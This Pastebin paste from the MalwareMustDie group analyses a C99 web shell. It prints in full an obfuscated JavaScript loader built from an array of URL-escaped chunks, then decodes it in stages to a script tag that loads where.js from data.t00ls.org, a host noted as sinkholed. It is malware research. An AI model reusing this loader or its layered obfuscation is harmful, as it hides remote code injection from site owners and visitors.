API tools faq
paste
MalwareMustDie

#MalwareMustDie - C99Shell with JS/Obfuscation to hide tools

MalwareMustDie
Nov 6th, 2012
2,198
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.08 KB | None | 0 0
raw download clone embed print report
  1. =======================================
  2. #MalwareMustDie - C99Shell with the
  3. Special JavaScript Tools Download
  4. Lead to: data.t00ls.org
  5. Special thanks to @genuix for the #Hint
  6. Original Paste of C99 Code at:http://pastebin.com/raw.php?i=np17Zydg
  7. ======================================
  8. // Most of the strings already cracked by @genuix
  9. // others are the bitmaps decoded in base64
  10. // BUT!!!!!!!! found something interesting...
  11. //
  12. // Found this evil script.....
  13. // you'll be happy to see these :-)))
  14.  
  15. <script type="text/javascript" language="javascript">
  16. <!--
  17. fF7eSD8=new Array();
  18. fF7eSD8[0]="%3Cscript%3E%0Adocu";
  19. fF7eSD8[1]="ment.write%28une";
  20. fF7eSD8[2]="scape%28%22%253Cscri";
  21. fF7eSD8[3]="pt%2520type%253D%25";
  22. fF7eSD8[4]="22text/javascr";
  23. fF7eSD8[5]="ipt%2522%253Edo";
  24. fF7eSD8[6]="cument.write%25";
  25. fF7eSD8[7]="28%2527%255Cu00";
  26. fF7eSD8[8]="3c%255Cu0073%255C";
  27. fF7eSD8[9]="u0063%255Cu0072";
  28. fF7eSD8[10]="%255Cu0069%255Cu";
  29. fF7eSD8[11]="0070%255Cu007";
  30. fF7eSD8[12]="4%255Cu0020%255C";
  31. fF7eSD8[13]="u0074%255Cu007";
  32. fF7eSD8[14]="9%255Cu0070%255Cu";
  33. fF7eSD8[15]="0065%255Cu003d%25";
  34. fF7eSD8[16]="5Cu0022%255Cu0";
  35. fF7eSD8[17]="074%255Cu0065%255C";
  36. fF7eSD8[18]="u0078%255Cu0074%25";
  37. fF7eSD8[19]="5Cu002f%255Cu";
  38. fF7eSD8[20]="006a%255Cu0061%255";
  39. fF7eSD8[21]="Cu0076%255Cu0";
  40. fF7eSD8[22]="061%255Cu0073%25";
  41. fF7eSD8[23]="5Cu0063%255Cu00";
  42. fF7eSD8[24]="72%255Cu0069%25";
  43. fF7eSD8[25]="5Cu0070%255Cu";
  44. fF7eSD8[26]="0074%255Cu0022";
  45. fF7eSD8[27]="%255Cu003e%255C";
  46. fF7eSD8[28]="u0064%255Cu00";
  47. fF7eSD8[29]="6f%255Cu0063%255C";
  48. fF7eSD8[30]="u0075%255Cu006";
  49. fF7eSD8[31]="d%255Cu0065%255Cu";
  50. fF7eSD8[32]="006e%255Cu0074%255";
  51. fF7eSD8[33]="Cu002e%255Cu00";
  52. fF7eSD8[34]="77%255Cu0072%25";
  53. fF7eSD8[35]="5Cu0069%255Cu";
  54. fF7eSD8[36]="0074%255Cu0065%25";
  55. fF7eSD8[37]="5Cu0028%255Cu002";
  56. fF7eSD8[38]="7%255Cu005c%255Cu";
  57. fF7eSD8[39]="0075%255Cu0030";
  58. fF7eSD8[40]="%255Cu0030%255Cu0";
  59. fF7eSD8[41]="033%255Cu0063%25";
  60. fF7eSD8[42]="5Cu005c%255Cu007";
  61. fF7eSD8[43]="5%255Cu0030%255Cu";
  62. fF7eSD8[44]="0030%255Cu0035";
  63. fF7eSD8[45]="%255Cu0033%255C";
  64. fF7eSD8[46]="u005c%255Cu0075";
  65. fF7eSD8[47]="%255Cu0030%255Cu";
  66. fF7eSD8[48]="0030%255Cu003";
  67. fF7eSD8[49]="4%255Cu0033%255";
  68. fF7eSD8[50]="Cu005c%255Cu007";
  69. fF7eSD8[51]="5%255Cu0030%255Cu";
  70. fF7eSD8[52]="0030%255Cu0035%255";
  71. fF7eSD8[53]="Cu0032%255Cu00";
  72. fF7eSD8[54]="5c%255Cu0075%255C";
  73. fF7eSD8[55]="u0030%255Cu0030%25";
  74. fF7eSD8[56]="5Cu0034%255Cu00";
  75. fF7eSD8[57]="39%255Cu005c%255Cu";
  76. fF7eSD8[58]="0075%255Cu0030%255";
  77. fF7eSD8[59]="Cu0030%255Cu003";
  78. fF7eSD8[60]="5%255Cu0030%255C";
  79. fF7eSD8[61]="u005c%255Cu0075";
  80. fF7eSD8[62]="%255Cu0030%255Cu00";
  81. fF7eSD8[63]="30%255Cu0035%255";
  82. fF7eSD8[64]="Cu0034%255Cu005";
  83. fF7eSD8[65]="c%255Cu0075%255C";
  84. fF7eSD8[66]="u0030%255Cu0030%25";
  85. fF7eSD8[67]="5Cu0032%255Cu";
  86. fF7eSD8[68]="0030%255Cu005c%25";
  87. fF7eSD8[69]="5Cu0075%255Cu00";
  88. fF7eSD8[70]="30%255Cu0030%255";
  89. fF7eSD8[71]="Cu0035%255Cu003";
  90. fF7eSD8[72]="3%255Cu005c%255Cu0";
  91. fF7eSD8[73]="075%255Cu0030";
  92. fF7eSD8[74]="%255Cu0030%255Cu00";
  93. fF7eSD8[75]="35%255Cu0032%25";
  94. fF7eSD8[76]="5Cu005c%255Cu00";
  95. fF7eSD8[77]="75%255Cu0030%255Cu";
  96. fF7eSD8[78]="0030%255Cu003";
  97. fF7eSD8[79]="4%255Cu0033%255Cu";
  98. fF7eSD8[80]="005c%255Cu0075%25";
  99. fF7eSD8[81]="5Cu0030%255Cu";
  100. fF7eSD8[82]="0030%255Cu0033";
  101. fF7eSD8[83]="%255Cu0064%255Cu0";
  102. fF7eSD8[84]="05c%255Cu0075%25";
  103. fF7eSD8[85]="5Cu0030%255Cu003";
  104. fF7eSD8[86]="0%255Cu0036%255";
  105. fF7eSD8[87]="Cu0038%255Cu0";
  106. fF7eSD8[88]="05c%255Cu0075%255C";
  107. fF7eSD8[89]="u0030%255Cu003";
  108. fF7eSD8[90]="0%255Cu0037%255C";
  109. fF7eSD8[91]="u0034%255Cu005c%25";
  110. fF7eSD8[92]="5Cu0075%255Cu";
  111. fF7eSD8[93]="0030%255Cu0030";
  112. fF7eSD8[94]="%255Cu0037%255Cu";
  113. fF7eSD8[95]="0034%255Cu005c%25";
  114. fF7eSD8[96]="5Cu0075%255Cu00";
  115. fF7eSD8[97]="30%255Cu0030%255Cu";
  116. fF7eSD8[98]="0037%255Cu0030%255";
  117. fF7eSD8[99]="Cu005c%255Cu00";
  118. fF7eSD8[100]="75%255Cu0030%255";
  119. fF7eSD8[101]="Cu0030%255Cu00";
  120. fF7eSD8[102]="33%255Cu0061%255Cu";
  121. fF7eSD8[103]="005c%255Cu0075";
  122. fF7eSD8[104]="%255Cu0030%255C";
  123. fF7eSD8[105]="u0030%255Cu0032%25";
  124. fF7eSD8[106]="5Cu0066%255Cu00";
  125. fF7eSD8[107]="5c%255Cu0075%255Cu";
  126. fF7eSD8[108]="0030%255Cu0030%25";
  127. fF7eSD8[109]="5Cu0032%255Cu0";
  128. fF7eSD8[110]="066%255Cu005c";
  129. fF7eSD8[111]="%255Cu0075%255Cu";
  130. fF7eSD8[112]="0030%255Cu0030%25";
  131. fF7eSD8[113]="5Cu0036%255Cu003";
  132. fF7eSD8[114]="4%255Cu005c%255C";
  133. fF7eSD8[115]="u0075%255Cu003";
  134. fF7eSD8[116]="0%255Cu0030%255C";
  135. fF7eSD8[117]="u0036%255Cu00";
  136. fF7eSD8[118]="31%255Cu005c%255";
  137. fF7eSD8[119]="Cu0075%255Cu00";
  138. fF7eSD8[120]="30%255Cu0030%255Cu";
  139. fF7eSD8[121]="0037%255Cu0034";
  140. fF7eSD8[122]="%255Cu005c%255Cu00";
  141. fF7eSD8[123]="75%255Cu0030%255C";
  142. fF7eSD8[124]="u0030%255Cu003";
  143. fF7eSD8[125]="6%255Cu0031%255";
  144. fF7eSD8[126]="Cu005c%255Cu007";
  145. fF7eSD8[127]="5%255Cu0030%255";
  146. fF7eSD8[128]="Cu0030%255Cu0";
  147. fF7eSD8[129]="032%255Cu0065";
  148. fF7eSD8[130]="%255Cu005c%255C";
  149. fF7eSD8[131]="u0075%255Cu0030%25";
  150. fF7eSD8[132]="5Cu0030%255Cu003";
  151. fF7eSD8[133]="7%255Cu0034%255Cu0";
  152. fF7eSD8[134]="05c%255Cu0075%255C";
  153. fF7eSD8[135]="u0030%255Cu00";
  154. fF7eSD8[136]="30%255Cu0033%255C";
  155. fF7eSD8[137]="u0030%255Cu005";
  156. fF7eSD8[138]="c%255Cu0075%255Cu";
  157. fF7eSD8[139]="0030%255Cu003";
  158. fF7eSD8[140]="0%255Cu0033%255C";
  159. fF7eSD8[141]="u0030%255Cu005";
  160. fF7eSD8[142]="c%255Cu0075%255";
  161. fF7eSD8[143]="Cu0030%255Cu0";
  162. fF7eSD8[144]="030%255Cu0036%255C";
  163. fF7eSD8[145]="u0063%255Cu005c";
  164. fF7eSD8[146]="%255Cu0075%255C";
  165. fF7eSD8[147]="u0030%255Cu00";
  166. fF7eSD8[148]="30%255Cu0037%25";
  167. fF7eSD8[149]="5Cu0033%255Cu00";
  168. fF7eSD8[150]="5c%255Cu0075%255";
  169. fF7eSD8[151]="Cu0030%255Cu00";
  170. fF7eSD8[152]="30%255Cu0032%255";
  171. fF7eSD8[153]="Cu0065%255Cu005c";
  172. fF7eSD8[154]="%255Cu0075%255C";
  173. fF7eSD8[155]="u0030%255Cu00";
  174. fF7eSD8[156]="30%255Cu0036%255Cu";
  175. fF7eSD8[157]="0066%255Cu005c%255";
  176. fF7eSD8[158]="Cu0075%255Cu00";
  177. fF7eSD8[159]="30%255Cu0030%255Cu";
  178. fF7eSD8[160]="0037%255Cu0032%25";
  179. fF7eSD8[161]="5Cu005c%255Cu007";
  180. fF7eSD8[162]="5%255Cu0030%255C";
  181. fF7eSD8[163]="u0030%255Cu0036%25";
  182. fF7eSD8[164]="5Cu0037%255Cu00";
  183. fF7eSD8[165]="5c%255Cu0075%255";
  184. fF7eSD8[166]="Cu0030%255Cu0030";
  185. fF7eSD8[167]="%255Cu0032%255Cu00";
  186. fF7eSD8[168]="66%255Cu005c%255";
  187. fF7eSD8[169]="Cu0075%255Cu0";
  188. fF7eSD8[170]="030%255Cu0030%255C";
  189. fF7eSD8[171]="u0037%255Cu0037";
  190. fF7eSD8[172]="%255Cu005c%255Cu";
  191. fF7eSD8[173]="0075%255Cu0030%25";
  192. fF7eSD8[174]="5Cu0030%255Cu";
  193. fF7eSD8[175]="0036%255Cu0038%255";
  194. fF7eSD8[176]="Cu005c%255Cu007";
  195. fF7eSD8[177]="5%255Cu0030%255";
  196. fF7eSD8[178]="Cu0030%255Cu0036";
  197. fF7eSD8[179]="%255Cu0035%255Cu00";
  198. fF7eSD8[180]="5c%255Cu0075%255Cu";
  199. fF7eSD8[181]="0030%255Cu003";
  200. fF7eSD8[182]="0%255Cu0037%255C";
  201. fF7eSD8[183]="u0032%255Cu00";
  202. fF7eSD8[184]="5c%255Cu0075%255";
  203. fF7eSD8[185]="Cu0030%255Cu0";
  204. fF7eSD8[186]="030%255Cu0036%25";
  205. fF7eSD8[187]="5Cu0035%255Cu0";
  206. fF7eSD8[188]="05c%255Cu0075";
  207. fF7eSD8[189]="%255Cu0030%255Cu0";
  208. fF7eSD8[190]="030%255Cu0032";
  209. fF7eSD8[191]="%255Cu0065%255Cu";
  210. fF7eSD8[192]="005c%255Cu0075";
  211. fF7eSD8[193]="%255Cu0030%255Cu00";
  212. fF7eSD8[194]="30%255Cu0036%25";
  213. fF7eSD8[195]="5Cu0061%255Cu";
  214. fF7eSD8[196]="005c%255Cu007";
  215. fF7eSD8[197]="5%255Cu0030%255";
  216. fF7eSD8[198]="Cu0030%255Cu0037";
  217. fF7eSD8[199]="%255Cu0033%255Cu0";
  218. fF7eSD8[200]="05c%255Cu0075%255C";
  219. fF7eSD8[201]="u0030%255Cu00";
  220. fF7eSD8[202]="30%255Cu0033%255Cu";
  221. fF7eSD8[203]="0065%255Cu005";
  222. fF7eSD8[204]="c%255Cu0075%255Cu";
  223. fF7eSD8[205]="0030%255Cu0030%25";
  224. fF7eSD8[206]="5Cu0033%255Cu00";
  225. fF7eSD8[207]="63%255Cu005c%255C";
  226. fF7eSD8[208]="u0075%255Cu0030";
  227. fF7eSD8[209]="%255Cu0030%255Cu0";
  228. fF7eSD8[210]="032%255Cu0066%255";
  229. fF7eSD8[211]="Cu005c%255Cu0";
  230. fF7eSD8[212]="075%255Cu0030%25";
  231. fF7eSD8[213]="5Cu0030%255Cu";
  232. fF7eSD8[214]="0035%255Cu0033%255";
  233. fF7eSD8[215]="Cu005c%255Cu007";
  234. fF7eSD8[216]="5%255Cu0030%255Cu0";
  235. fF7eSD8[217]="030%255Cu0034%255";
  236. fF7eSD8[218]="Cu0033%255Cu00";
  237. fF7eSD8[219]="5c%255Cu0075%25";
  238. fF7eSD8[220]="5Cu0030%255Cu0";
  239. fF7eSD8[221]="030%255Cu0035";
  240. fF7eSD8[222]="%255Cu0032%255Cu0";
  241. fF7eSD8[223]="05c%255Cu0075";
  242. fF7eSD8[224]="%255Cu0030%255Cu";
  243. fF7eSD8[225]="0030%255Cu0034%25";
  244. fF7eSD8[226]="5Cu0039%255Cu0";
  245. fF7eSD8[227]="05c%255Cu0075%25";
  246. fF7eSD8[228]="5Cu0030%255Cu";
  247. fF7eSD8[229]="0030%255Cu0035%25";
  248. fF7eSD8[230]="5Cu0030%255Cu";
  249. fF7eSD8[231]="005c%255Cu0075%255";
  250. fF7eSD8[232]="Cu0030%255Cu0";
  251. fF7eSD8[233]="030%255Cu0035";
  252. fF7eSD8[234]="%255Cu0034%255Cu0";
  253. fF7eSD8[235]="05c%255Cu0075";
  254. fF7eSD8[236]="%255Cu0030%255Cu";
  255. fF7eSD8[237]="0030%255Cu0033%255";
  256. fF7eSD8[238]="Cu0065%255Cu0";
  257. fF7eSD8[239]="027%255Cu0029";
  258. fF7eSD8[240]="%255Cu003c%255C";
  259. fF7eSD8[241]="u002f%255Cu0073%25";
  260. fF7eSD8[242]="5Cu0063%255Cu007";
  261. fF7eSD8[243]="2%255Cu0069%255Cu";
  262. fF7eSD8[244]="0070%255Cu007";
  263. fF7eSD8[245]="4%255Cu003e%2527%25";
  264. fF7eSD8[246]="29%253C/script%25";
  265. fF7eSD8[247]="3E%22%29%29%3B%0A%3C/scri";
  266. fF7eSD8[248]="pt%3E";
  267. for (i = 0; i < fF7eSD8.length; i ++)
  268. {
  269. document.write(unescape(fF7eSD8[i]))
  270. }
  271. // -->
  272. </script>
  273.  
  274. -------------------------------------------
  275.  
  276. // first crack goes like these.....
  277.  
  278. <script type="text/javascript">document.write('
  279. \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003d\u0022\u0074
  280. \u0065\u0078\u0074\u002f\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022
  281. \u003e\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065
  282. \u0028\u0027\u005c\u0075\u0030\u0030\u0033\u0063\u005c\u0075\u0030\u0030\u0035\u0033\u005c
  283. \u0075\u0030\u0030\u0034\u0033\u005c\u0075\u0030\u0030\u0035\u0032\u005c\u0075\u0030\u0030
  284. \u0034\u0039\u005c\u0075\u0030\u0030\u0035\u0030\u005c\u0075\u0030\u0030\u0035\u0034\u005c
  285. \u0075\u0030\u0030\u0032\u0030\u005c\u0075\u0030\u0030\u0035\u0033\u005c\u0075\u0030\u0030
  286. \u0035\u0032\u005c\u0075\u0030\u0030\u0034\u0033\u005c\u0075\u0030\u0030\u0033\u0064\u005c
  287. \u0075\u0030\u0030\u0036\u0038\u005c\u0075\u0030\u0030\u0037\u0034\u005c\u0075\u0030\u0030
  288. \u0037\u0034\u005c\u0075\u0030\u0030\u0037\u0030\u005c\u0075\u0030\u0030\u0033\u0061\u005c
  289. \u0075\u0030\u0030\u0032\u0066\u005c\u0075\u0030\u0030\u0032\u0066\u005c\u0075\u0030\u0030
  290. \u0036\u0034\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0037\u0034\u005c
  291. \u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0032\u0065\u005c\u0075\u0030\u0030
  292. \u0037\u0034\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c
  293. \u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0037\u0033\u005c\u0075\u0030\u0030
  294. \u0032\u0065\u005c\u0075\u0030\u0030\u0036\u0066\u005c\u0075\u0030\u0030\u0037\u0032\u005c
  295. \u0075\u0030\u0030\u0036\u0037\u005c\u0075\u0030\u0030\u0032\u0066\u005c\u0075\u0030\u0030
  296. \u0037\u0037\u005c\u0075\u0030\u0030\u0036\u0038\u005c\u0075\u0030\u0030\u0036\u0035\u005c
  297. \u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030
  298. \u0032\u0065\u005c\u0075\u0030\u0030\u0036\u0061\u005c\u0075\u0030\u0030\u0037\u0033\u005c
  299. \u0075\u0030\u0030\u0033\u0065\u005c\u0075\u0030\u0030\u0033\u0063\u005c\u0075\u0030\u0030
  300. \u0032\u0066\u005c\u0075\u0030\u0030\u0035\u0033\u005c\u0075\u0030\u0030\u0034\u0033\u005c
  301. \u0075\u0030\u0030\u0035\u0032\u005c\u0075\u0030\u0030\u0034\u0039\u005c\u0075\u0030\u0030
  302. \u0035\u0030\u005c\u0075\u0030\u0030\u0035\u0034\u005c\u0075\u0030\u0030\u0033\u0065\u0027
  303. \u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>
  304.  
  305. ---------------------------------------------
  306.  
  307. // second round ....and runs it again to be like this:
  308.  
  309. <script type="text/javascript">document.write('
  310. \u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074
  311. \u0070\u003a\u002f\u002f\u0064\u0061\u0074\u0061\u002e\u0074\u0030\u0030\u006c\u0073\u002e
  312. \u006f\u0072\u0067\u002f\u0077\u0068\u0065\u0072\u0065\u002e\u006a\u0073\u003e\u003c\u002f
  313. \u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
  314.  
  315. ------------------------------------------------
  316.  
  317. // third round ....Then it wrote the actual strings inside as:
  318.  
  319. <SCRIPT SRC=http://data.t00ls.org/where.js></SCRIPT>
  320.  
  321. ↑this is where the scriptkiddies download the aother hacktools..
  322. ...currently sinkhole...
  323.  
  324. --00:26:52-- http://data.t00ls.org/where.js
  325. => `where.js'
  326. Resolving data.t00ls.org... failed: Unknown host.
  327.  
  328. --------------------------------
  329. #MalwareMustDie
  330. @unixfreaxjp /malware]$ date
  331. Wed Nov 7 00:31:40 JST 2012
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!